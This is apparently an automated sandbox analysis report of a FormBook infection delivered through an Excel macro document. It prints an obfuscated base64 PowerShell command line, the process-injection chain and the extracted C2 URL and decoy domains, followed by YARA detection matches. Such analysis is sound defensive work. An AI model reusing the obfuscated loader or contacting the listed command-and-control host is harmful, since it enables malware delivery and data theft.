AHMASwByAHUAWABjAGQAegBSAFUAWQBTAGEAcwBSAE0AeAAgAD0AIAAnAEgAbgAnADsADQAKACQAagBRAHMARgBvAHoARQBUAEsAegBsAGIAUgB6AGcARgBQAEgAcwBOAGUAUABoAHcAZAB0ACAAPQAgACcATgB2AEgAdABYAEsAVABJAHUAegBwAGoAYwBZAGYASABVAG4AcQBKAHMAbABIAGgAdABQAFoAQQBVAGoAdgBiAHUARQByAFkARABHAE4AUgAnADsADQAKACQAcQBsAEYAYQBZAFEAbwB5AEgATQBKAG0AawBDAGIAbgBaAHoASQBsAFQAbwBMAEQATgBvAFgAZwBHAEUATwBaAFoATABDAEEAQgBIAFYAegBrAEIAIAA9ACAAJwBYAG0AcABLAEIAUQBsAGQARwBGAGYAZQAnADsADQAKACQAYQBDAE0AIAA9ACAAJwBzAEgAcgBEAHgAagBNAFkAQQBiAG0AUwBlAEkAQQBSAGIAbwBSAFkAZQBXAFEAVgBiAEgAVQB0AGgAQQAnADsADQAKACQAegB1AGwASABkAEoASgBaAEMAYwBsAEEAcAB5AEwAYwB3AGYATQBhAGwAawAgAD0AIAAnAEUAVgByAFcAYgBxAFAAUwByAEEAQgBuAFgAcwBCAFgASABSAFAATwB3AHQAVgBiAFgAUQBmAFgATwBVAFoAbgBPACcAOwANAAoAJABoAGwAbABuAGgAaQBuAEoAIAA9ACAAJwBBAG4ATABuAGoAdgBJAEYASgBXAFcAcgBLAEEAUQB5AEwATAByAEUAWABiAE4AWgBQAEwAUABsAFQAagBnAGIAbgB6AFUAbgBNAGMAJwA7AA0ACgAkAGIARwBQAFAAUgBzAFEAVwBsAFUAbwBXAFgAdgBFAFcAWgBhAG0AWABYAGcAVwBsAGEAcQB1AEQASwBmAGQAbQBqAFAAUAB5AEgATAB3AGcAIAA9ACAAJwBvAGQAUgBlAE4ASgBmAGkAZAB2AE4AYQBFAFkAdgBrAGQAcABhAHgATQBNAEcAcgBDAG0ASABmAEcATwBPAGQARgBZAGkARABFAEcATQBnAFAAVgBoACcAOwANAAoAJABVAEwAUQBoAGIASQBoAHcASQBoAEcAPQAgACQAVQBMAFEAaABiAEkAaAB3AEkAaABHACAAKwAgADEAOwB9ACAAVwBoAGkAbABlACAAKAAkAFUATABRAGgAYgBJAGgAdwBJAGgARwAgAC0AbgBlACAAMQAxACkADQAKAEkAZgAgACgAJwBQAE0AZgBxAFUATwBkAFcAVgBqAG0AYwBXAFoAYwBhAEIAQQBiAE8AZwBqAFUAZgBwAHIAZgBYAGMAdABpACcAIAAtAGUAcQAgACcAZQBXAGIAcABIAFIATABzAGwAcwBIAFcAbABHAGgAZgBlAGwAZgBPAHUAVABEAGYAcgB6AEEAYwBpAEcAdABjAEEAdwB5AHoAJwApACAAewANAAoAJABtAFQAawBvAGkAZABvAGMAeQB1AGoASwBBAHMAcQBPAFQAdwBMAFQAdgB4AEgAUQBpAEoAZQB5AGYAVgBwAEkAaABnAHIAUwB2AFoATABwAE8ARAAgAD0AIAAnAEYAUgBTAGkATgBDAE4AaABBAG0AZwBDAHAATABVAEcAWQB6AHAAeABkAEUAYgBkAFQAQgBZAFQAdABrAFYARgBzAEUAQwB5AFEAYQAnADsADQAKACQAdwBSAG8AcABWAEIAZQBDAEcAYgBUAG4AcQBZAEYAIAA9ACAAJwBBAHAAbwBQAE0AZQB1AG4AUABSAGIASwBrAEoAJwA7AA0ACgAkAHEAeQBpAHQAZwBwAFAARwBiAHAAegBSAHMAYQB3AGUAZwBtAG8AIAA9ACAAJwBKAGIATAAnADsADQAKACQAUgBXAEEAWgBEACAAPQAgACcAVABSAHgARgBjAHAASQBlAFoAYQBrAGoATQBhAE0ATQBDAE4AVABtAHUAWQB2ACcAOwANAAoAJABNAE8AbQBlAGMASgBvACAAPQAgACcAQwBCAFYAaABUAG0AeABIAFcAQwBNAE8AUgBaAE8AawByAEUAVABuAEcAUQBmAHYAVwBxAHQATwBDAGQAQwBQAG0AdQBoAEwAJwA7AA0ACgAkAGYAcwBRAFAATAAgAD0AIAAnAHMATABoAHAAbQBBAEIAbgBYAHEAQQBqAGwAVgBhACcAOwANAAoAJABjAHMAagBGAHMAegB3AGIAVwBzACAAPQAgACcAZwBNAEwAQwAnADsADQAKACQAdgBBAG4AawBwAEIASABOAEEAcQBmAFoAbABLAHYAcABlAFUAUQBZAGcAIAA9ACAAJwBZAHMATwBGAFMAdQAnADsADQAKACQAVgBiAEwAbgBkAG8AbABpAHAAVgBiAGsAVgBGAEIAVQBYAHEATAB3AE4AQgByAHYAZQByAHAAYwB2AFYAagBpAE4AUQBlAFAAVQBtAEkAVgBLACAAPQAgACcAbwB5AG8AbgBLAEEAVwAnADsADQAKACQAcQBPAEgAeABqAFQAagBQAEkAbQB6AEkAbgBVAG0AdABYAEYAYQBtAEEAIAA9ACAAJwBpAHAAbQBHAE4AdABIAHEAZwBvAEcAVwBlAFUAYgBQAGgASwBnAEUAZABWAFcAQgBVAFUATQB2AFAARgBaACcAOwANAAoAJABZAEYAZwBSAEwAYwBHAHEASABSAEcASwBDAFEAcABSAFIASQBYAFEARgB2AEgATQBUAGsAbQBzAGcATQBiACAAPQAgACcAUABWAHkAWQBvAEsARQBGAEQAcQB4AEwAUABMAHoARABmAHUAZABIAGkASgBlACcAOwANAAoAfQANAAoAJAB5AFUAeABhAHAATwBKAHYAcQBmAHYAaABSAFEAZABIAEQAUwBNAFAAeAB2AHcASQBsACAAPQAgACcATgBtAGoAVABzAEYAcgBWAGEAVABNAGUAUABwAGcAQgBVAGoAUQBTAGwAUABSAFYARQBQAHgATwBmAEMAJwA7AA0ACgBEAE8AewANAAoAJAB5AEkATAAgAD0AIAAnAE4ARwBSAE8AWQBqAHQAaABaAEcAZABRAFIAcgBJAFkATgBuAGoAUABoAHcARwB2AGsAWgBVAEEAbQAnADsADQAKACQAcQBvAGsAcwBPAGkASAAgAD0AIAAnAEIAdgBTAHQARwBjAHkAdgBnAGUAQQBkAHAASwBaAHYAQQBSAEEAVgBlAHkAUAB0AHUAUwBQAG8AZgBZAGMAYQBSAFUAbQBuAHgAbgAnADsADQAKACQAZAB4AG8AdABxAEEASgBTAGYAUABwAHIAeABoAGwATwBDAGcAWQB6AG8ATQBKAFAASABCAFoATQBVAFkAbAB5AE4AYgBXACAAPQAgACcAcABGAFoAdABsAEEAagBaAHEAaABmAHMAZgBGAGoARwBZAG8AQgBSAG8AJwA7AA0ACgAkAGwAbwBhAHcAeABIAGQAcgBlAFYATABOAFoAeABIAGYATwBvAGMAawBZAGEAIAA9ACAAJwBnAGcAUABwAGYAWgBZAGEARgBrAFAAVABrAFMAbwBEAGMAdgB6ACcAOwANAAoAJABLAGgAUgBnACAAPQAgACcAegB0AGEATQBvAEQAQQBMAFQAdQBQAGgAUwB5AFIARgB1AEcAZABKAGQAVwBNAFoAbABBAG8AWgBYAEwAegBQACcAOwANAAoAJABDAGYAZwB5AE4AUQBnAFAASQBSAFkAWQBWAEsAeABpAHgAUABhAG8AWABKAGQAZwBBAGIAbwBPAGIAbwAgAD0AIAAnAHUAQQB5AFAAVABsAEgAZwAnADsADQAKACQAdwB1AFUARQBvAEIAUABwAHIAcgBhAHYAWgBhAE0AdABCAEEAeQBtAGMAUgBuAFUASgBlAFgAVwB2AGUAdwBwAGoAbAByACAAPQAgACcAbwBZAHIAeQBMAHkAWABrAE4ATQBWAGEAbQBWAFIAawBKAHUATQBmAEcAQQB2AEsAZQAnADsADQAKACQAdABOAHUAawBNAG8AaQBqAEYAYwBJAHoAYQBlAHQARABHAHcASgB4AGsAYQBNAEwAZwBvAFkATQBXAG8AZABoAFUAUwBFAEsAcQBkACAAPQAgACcAaAByACcAOwANAAoAJABRAG8AYwBKACAAPQAgACcAaQBsAEQAdQB5AEIAaABKAFQAQgBpAEQAWABQAFcATQBSAHoAJwA7AA0ACgAkAGUASABaAGoATQBjAHcAYwBGAGcASgBYAGoAWABVAHEAYgBTAHQAZQBnAG4ASgAgAD0AIAAnAEoASABaAGMAUgBWAHEAegBwAEIAZQBNAEkAQgBxAFIAQwBaAGIAYwBKAGQAegBnAEQAWgB1AHQAWABWAHUAJwA7AA0ACgAkAHkAbwBhAEYAQwBVAEsAawBwAEsAaQBoAHMASQBoAFoAYwBjAGMASABMAGcAYgBmAEkAdABaAHMAYQB3AGIAVQBHAG4ATgBUAGIAIAA9ACAAJwBPAGkATwBxAG0AegB2AFIAbwB1AHIAVgBSAHYAcwBuAGcAUwBOAHUAdwBKAHUAUwBLAHQAaQBPAGEARQB2AE8AJwA7AA0ACgAkAHEATgB1AHMAVQB0AGIAawByAEUAZQBCAEUAZgBnAGIAVABHAHUARwBnAHAARQBuAHcAZwB0AFEAZwBxAGoAegBjAFcAYgBoAHgAdQBMAFkAbABKACAAPQAgACcARQBQAFIARgBPAEIAJwA7AA0ACgAkAEgAeQBBAEkAUgBCAEkASAB3AG8AegBMAEQAQQBWAGYAWQBpAEQAegBkAFoAdgBXAFUAWABqAEEAWABlAGEAZgBPACAAPQAgACcAagBsAHkAVQBGAFoAWQBxAHgAWABZAGEARgBFAGoAawB0AFgASwBDAEoAaABDAGUAbgB1AFIASQBqAFIATgBVAHcASgBSAGoAZwBEAGMAJwA7AA0ACgAkAGIAbQBiAFgAeAB1AFIAZgBRAG4AbABDAFYATQBrAEIAaQBVAGcATABIAFAASABmAEoARQAgAD0AIAAnAHcAbgB6AEQAcAB1AGYAYgBXAEcAZQBoAHQAYwBtAHIAdwBnAEwAeQBrAFkAUABCAE0AJwA7AA0ACgAkAHAAbwBHAEEAWABNAFgAbgBwAHAAdwBwAEoAdgBZAEQAVwBpAHcAYQBNAD0AIAAkAHAAbwBHAEEAWABNAFgAbgBwAHAAdwBwAEoAdgBZAEQAVwBpAHcAYQBNACAAKwAgADEAOwB9ACAAVwBoAGkAbABlACAAKAAkAHAAbwBHAEEAWABNAFgAbgBwAHAAdwBwAEoAdgBZAEQAVwBpAHcAYQBNACAALQBuAGUAIAAxADQAKQANAAoAJABSAFcATABmAHYATwBzAFEAVgBzAFIAagB2AEkAcABrAE8AdgBEAG4AIAA9ACAAJwBpAFYAWABMAHoAeQBGAHMAWABYAHgAcgBUAGQASgBRAHIASwBRAG8AZABIAHUAYQBNAGsAQwBJAEEASwBVAHgAWQAnADsADQAKAEYAdQBuAGMAdABpAG8AbgAgAHgARQBRAEIAcQBjAEYAWABVAE0AWABVAHAAcwBJAGsAagBuAEMAZgBmAEsAWgBZAEkAbgB4AE8AbQBFAG4AcABMAHsAIABwAGEAcgBhAG0AKAAkAGoAQQBuAFQAdwBRAG4AWQB4AFUAVAByAGMAZQBnAFUAVwBsAG4AeQBKAGEAYgB4AHkATwB2AHcAcwBNAEQAIAAsACAAJABUAGoAIAAsACAAJABJAGMAWABOAEEAQgBFAEsAWgBHAFYASQBYAGMAZgBvAGoASwBhAGEASgBaAHAAVgBpAFUAcQBmAGwAUQBUAFkAdABsAFkAcgB5AFgAKQANAAoAJABjAFYAdABYAHkAdABjAHgAVwBUAE4AdwBkAGYAawBBAG8ARQB3AHIASAAgAD0AIAAnAGYAcgBzAEQAZgBxAGsAUQBZAGgASQBTAFEAbQByAEwAbwBJAEQAaQBvAEcASwBNAEsAUgBlAGwAUABqAHQAVABRACcAOwANAAoAJABxAEIAZQB2AE4AbABNAEYAdQBmAG4ATABPAHgASgBkAFEAbgBvAFkAeQBaAGcAZwB0AE4ATQB5AEEAcABvAHAAQgBhAHcAIAA9ACAAJwBnAHMAdgBSAFcAaQBMAGUAWQB5AEMAZwBjAG0AUwBGAGUAcgByAFIAVgB5AEMAegBZAE4ARgBFAHIAeQBKAG8AQgBUAHcAJwA7AA0ACgAkAHMAWABDAFAATgBCAEgAdQBLAGcAVwBPAFcAagBLAEsAaQBmAFUAaABxACAAPQAgACcAcwBJAGQARwBuAGEAcABPAGYASgBwAHUATgBIAG8AYwBEAFQAcgBIAHAAcwByAHEAaQBJAG8AeQBGAFYAeQBQAGgAdwBlAHQAbABHAE8AZwAnADsADQAKACQAdwBCAE0AWgBiACAAPQAgACcAQwBWAEcAYwBCAHEAaQBHAEEAUgBtAFkAZgBtAHEASgBKAEsAYQAnADsADQAKACQAUQBkAHYAcQB3AEYASwBDAHMAcgBlAFEAIAA9ACAAJwBtAGwAZAB5AHQAeABZACcAOwANAAoAJABxAGUAYwB5AGkAaQB1AE8AbgByAEIAegBPAEYAWgBhAFEAZgB2AGcAZgBOAEkAbQBWAFIAdABBAE4ASwBQAE4AQgBPAFoAeQBTAHIATwBXAFAAbwBGACAAPQAgACcAYwBSAHMAZwBNAEQAaQBPAEIAcwBUAGQAVgBwAGQAUQBwAHUAQQBjAGIAbwB4AEEAZwBhAEgAWQBRAFkAUQBxAEgASQBKAEUAWgBOAG4ASwBiAEIATAAnADsADQAKACQAdgB3AGMAYwBPAHgAaABVAG8AIAA9ACAAJwBZAG8AVAByAHoAbAB2AEoAeABjAGIAYwBWAE4AZwBZAHEAYgBIAHAAQgBhAGMAbwBFACcAOwANAAoAJAB4AGUASwBUAHIAdwBDAGYAawBWAGsAaABOAEIAUABSAEUAagBoAFQAYQBQAHcAcABHAEcATgB5AGIAeQBMACAAPQAgACcAbgBQAG4AUQB6AGUAbABlAFoAcQBjAEsAbgBKAE8ARgBhAGoAVgB0AEcAbABKAGgAaABVACcAOwANAAoAfQANAAoASQBmACAAKAAnAGsAagBFAEQAbABLAEYAdQB5AE4AeQAnACAALQBlAHEAIAAnAFoAeABDAHQAawBuAG0AQgB4AHMASABYAHMAYwBSAFkAJwApACAAewANAAoAJABGAEYAaQAgAD0AIAAnAFMAQQB2AFYAbQBxAEEAaABPAFAAcgBjAFIAdwB2AEQAcgBaAHUAdgBTAE8AcwBiAGcASwBKACcAOwANAAoAJABoAHQAcwBJAFAAbQBIAHcASABZAHgAdwBtAFUAagBjAFEAdQBiAGcAVwBVAEoAZwBMAG4ATgBEAEgAVQBvAGIAaABJAEEAVQBYACAAPQAgACcATgBlAG8AeQB3AFQAYgB5AEoAeQBmAFEASwBtAGoAZABXAE4AawBMAHgAYgBaAEQAbwBtAGsAVgBQAGUAJwA7AA0ACgAkAE8ARgBoAGgAeAByAFgAWABwAEYATQBlAE8AWQByAEoAQwAgAD0AIAAnAEQAbQBtAGsATABtAGwARQBrAEsASwBpAEYAagBmAGUAUQBMAGQARQBtAG0AeQBxAHUARwBrAHgATABmAHgAYwBpAGQATAByAGcAJwA7AA0ACgAkAHQAdgB3AHMARwBOAE0ASAB6AGQAeQBrAEgAZwBnAHgARgBSAG4AdwBxAEYAQgBuAHQAIAA9ACAAJwBNAGkAQQBjAFgAbgAnADsADQAKACQAbgBSAGkASQB1AGYAbABkAG4ARwBIAHoAYQBYAFEAdgBrAFgAdQBFAGsAbQBvAHQASQB5AEEAQQBlAEcAWABGAEwAbQBVAE8AeQBvAEwAbABCAFQAIAA9ACAAJwB5AHUAbwBTACcAOwANAAoAJAB2AG0AUABFAGQAaQBOAEEAZABvAEEAdgBlAGwAeQBnAGkAQwBuAG8AQwBDAHgAdwBNAEkARABRAGoAIAA9ACAAJwB6AFQAZwBTAEUAcwBxAFQAYgBjAFkAVQBsAEoAbwBQAEcAUABWAFgAUAByAEIAZQBmAHQAbwBUAHIAVgBlAHgAUgBuAHAAJwA7AA0ACgAkAFAATABoAEYAcABQAGIASwBQAGkAUgBvAEgAdwBCAG8AdQBNAFoASABTAEIAbgBMAEUAWABiACAAPQAgACcAeQBiAEQAeABUAEkAJwA7AA0ACgAkAHUAaQAgAD0AIAAnAGgAQQBRAHEATwB3AGMAQQBNAHUAVABxAEMARQBOACcAOwANAAoAJABOAE4AWABXAEEAUwBuAFYATQBvAGYAVABVAHkAdwBHAEYAZQBlAFoAcgBjAG4AcgBpAEUATABoAGwAIAA9ACAAJwBZAHkAagBtAHYAbQBXACcAOwANAAoAJABQAFAATQB1AGQAYQBRAEkAZgBOAHkAIAA9ACAAJwBsAFkAYQBvAHAAawBaAGcAbgB3AEcARwAnADsADQAKAH0ADQAKAFcAaABpAGwAZQAgACgAJABGAFAAaABqAGkAQwBKAGoAdABPAFAATQB4AHkATgBhAFoAWQB4AGkAWQBWAEEAWQB2AHcATABOAHEAWQBTACAALQBuAGUAIAA2ACkAIAB7AA0ACgAkAEcASgBZAEwAagBZAHgASwAgAD0AIAAnAGQAcgBLAEsAYgBzAGwATQBGAE4AWQBKAFgATABqAE8ASQBvAGwAcgB3AHQAVQB2AEcARgBuAGEAQgBxAEEAYQBtAHQAdgAnADsADQAKACQARgBQAGgAagBpAEMASgBqAHQATwBQAE0AeAB5AE4AYQBaAFkAeABpAFkAVgBBAFkAdgB3AEwATgBxAFkAUwA9ACAAJABGAFAAaABqAGkAQwBKAGoAdABPAFAATQB4AHkATgBhAFoAWQB4AGkAWQBWAEEAWQB2AHcATABOAHEAWQBTACAAKwAgADEAOwAkAHEATgBUAEUAWgBBAGsASwB0AHoAaQB4AG8AdwBhAGsATQBUAHQAagBYAE8ARABXAEUATAAgAD0AIAAnAE8ATQB5AFcAZQBRAEYAWQB2AFYAJwA7AA0ACgAkAEYAUABoAGoAaQBDAEoAagB0AE8AUABNAHgAeQBOAGEAWgBZAHgAaQBZAFYAQQBZAHYAdwBMAE4AcQBZAFMAPQAgACQARgBQAGgAagBpAEMASgBqAHQATwBQAE0AeAB5AE4AYQBaAFkAeABpAFkAVgBBAFkAdgB3AEwATgBxAFkAUwAgACsAIAAxADsAJABSAHYASQBKAEIASABXAHEAbABGAFEAUQBPAFQAQQBMAEcAYgBKAHgAQQBPAHAAVwB5AHYAYwBFACAAPQAgACcAagBYAGYATwBmAEIAeABiAE4ATQB3AHoATwBaAEYAeQB2AGsARABlAEYAeQB4AGwAWQBnAEQARwAnADsADQAKACQARgBQAGgAagBpAEMASgBqAHQATwBQAE0AeAB5AE4AYQBaAFkAeABpAFkAVgBBAFkAdgB3AEwATgBxAFkAUwA9ACAAJABGAFAAaABqAGkAQwBKAGoAdABPAFAATQB4AHkATgBhAFoAWQB4AGkAWQBWAEEAWQB2AHcATABOAHEAWQBTACAAKwAgADEAOwAkAEwARwBlAFMASgBDAGkAawBDAGkAUgBDAGoAcwBQAE4AeQBtAG8AawBYAEMATABaAGEAYgBrAGEAdABwAHkAeQAgAD0AIAAnAHAAQwBHAFIAZwBGAFgAWABOAHQAQgBtAGIAVgBHAGgAWQBhAHUATwBWAE8ASgB1AEYAcwBoAFIASAByAE0AawBTAEwAdQBxACcAOwANAAoAJABGAFAAaABqAGkAQwBKAGoAdABPAFAATQB4AHkATgBhAFoAWQB4AGkAWQBWAEEAWQB2AHcATABOAHEAWQBTAD0AIAAkAEYAUABoAGoAaQBDAEoAagB0AE8AUABNAHgAeQBOAGEAWgBZAHgAaQBZAFYAQQBZAHYAdwBMAE4AcQBZAFMAIAArACAAMQA7ACQAdgBSAGgAUgBOAEsASQBLAG0AIAA9ACAAJwBGAGUAcwBVAFAARQBqAFYAYQBzAEwATQBvAFgARgBQAFcAZwBSAFQAUABhAFAAWgBkAEkATgB4AEkARQBBAGsAUwB0AGIAbgBPAFcAdwBmAGkAcAAnADsADQAKACQARgBQAGgAagBpAEMASgBqAHQATwBQAE0AeAB5AE4AYQBaAFkAeABpAFkAVgBBAFkAdgB3AEwATgBxAFkAUwA9ACAAJABGAFAAaABqAGkAQwBKAGoAdABPAFAATQB4AHkATgBhAFoAWQB4AGkAWQBWAEEAWQB2AHcATABOAHEAWQBTACAAKwAgADEAOwAkAHgAeABqAGQASgBMAHgAbgBiAHQAUwBpAGYAUABUAHIARwAgAD0AIAAnAG0ATgBXAHMAYgB0AHUAdgBSAEIAQQBrAGwAawBhAEgAUgBiAHUAZgBEAG0ASwBRAFkAcgB6AEwAdwBZAHUAZgBxAG8AdwBjACcAOwANAAoAJABGAFAAaABqAGkAQwBKAGoAdABPAFAATQB4AHkATgBhAFoAWQB4AGkAWQBWAEEAWQB2AHcATABOAHEAWQBTAD0AIAAkAEYAUABoAGoAaQBDAEoAagB0AE8AUABNAHgAeQBOAGEAWgBZAHgAaQBZAFYAQQBZAHYAdwBMAE4AcQBZAFMAIAArACAAMQA7AH0ADQAKAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • qMBRkI.exe (PID: 4652 cmdline: 'C:\Users\user\AppData\Local\Temp\qMBRkI.exe' MD5: 93259FD8317C8518EBE331A3FAE2F45A)
          • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • help.exe (PID: 5276 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
              • cmd.exe (PID: 1948 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\qMBRkI.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
                • conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.koku-jieitai.info/w8en/"], "decoy": ["kratoscableties.com", "capialhealth.com", "crossandcrook.net", "thesongwriterschool.com", "serenityhomedits.com", "ivaporvault.com", "youhoddler.com", "my-financial-intelligence.com", "oshanskincare.com", "simplytomas.com", "quayvideohaiphong.com", "xn--produtosdesade-wrb.com", "mushroom.supplies", "tutiendaparagatos.com", "ppc-listing.info", "nocturnalgolfcartpeople.com", "gruzovikov.info", "lifecoach.works", "healthacker.com", "abhisclub.com", "xyohodlem.com", "nekotsuki.net", "leparpack.com", "fused180qr.com", "avadvisorsinc.com", "repairindonesia.net", "hyzykj.net", "cyberbeau.com", "pubgtroops.com", "cardiline.store", "cbdaclub.com", "yezq-yxvih.xyz", "autoproductosmercantil.com", "sarojgautam.com", "lilyrosecottage.net", "cinkenyo.com", "vixcheck.com", "enriquezcleaningservice.com", "xhzs021.com", "mundofreefire.online", "leteva.club", "dmosearch.com", "livisprogrammingadventure.com", "79firerescue.com", "think-ages.com", "skg-paxful.com", "anastasiamatkovskia.com", "cjmaeilnews.com", "vistaestimatingandservice.com", "reset-stance.com", "strivemdketamine.com", "historydecorz.com", "drdantherapy.com", "newbbwtube.com", "nicesubvert.com", "animalsneon.com", "sasayamagazine.com", "cristianbermejo.com", "instaespresso.com", "amanda-clark.com", "wire.wtf", "milfwagon.com", "waytogrowconsulting.com", "gourgio.club"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Purchase Order.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x10aba:$s1: Excel
  • 0x10c6b:$s1: Excel
  • 0x10c8e:$s1: Excel
  • 0x34eb:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_FormBookYara detected FormBookJoe Security
    dump.pcapFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x7aafbb:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7ab3e7:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7b7fde:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x7b7a84:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x7b80e0:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x7b82ea:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x7abed7:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x7b6c27:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x7acdb9:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x7bd744:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x7be99d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    dump.pcapFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x7ba2d6:$sqlite3step: 68 34 1C 7B E1
    • 0x7ba42f:$sqlite3step: 68 34 1C 7B E1
    • 0x7ba305:$sqlite3text: 68 38 2A 90 C5
    • 0x7ba470:$sqlite3text: 68 38 2A 90 C5
    • 0x7ba318:$sqlite3blob: 68 53 D8 7F 8C
    • 0x7ba486:$sqlite3blob: 68 53 D8 7F 8C

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\qMBRkI.exeJoeSecurity_FormBookYara detected FormBookJoe Security
      C:\Users\user\AppData\Local\Temp\qMBRkI.exeFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      C:\Users\user\AppData\Local\Temp\qMBRkI.exeFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x166c9:$sqlite3step: 68 34 1C 7B E1
      • 0x167dc:$sqlite3step: 68 34 1C 7B E1
      • 0x166f8:$sqlite3text: 68 38 2A 90 C5
      • 0x1681d:$sqlite3text: 68 38 2A 90 C5
      • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x16833:$sqlite3blob: 68 53 D8 7F 8C

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000012.00000000.351250789.0000000000E31000.00000020.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        00000012.00000000.351250789.0000000000E31000.00000020.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x75f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x136a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x137a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1391f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x83aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1240c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18797:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1983a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        00000012.00000000.351250789.0000000000E31000.00000020.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x156c9:$sqlite3step: 68 34 1C 7B E1
        • 0x157dc:$sqlite3step: 68 34 1C 7B E1
        • 0x156f8:$sqlite3text: 68 38 2A 90 C5
        • 0x1581d:$sqlite3text: 68 38 2A 90 C5
        • 0x1570b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15833:$sqlite3blob: 68 53 D8 7F 8C
        00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
          00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 22 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          18.0.qMBRkI.exe.e30000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            18.0.qMBRkI.exe.e30000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
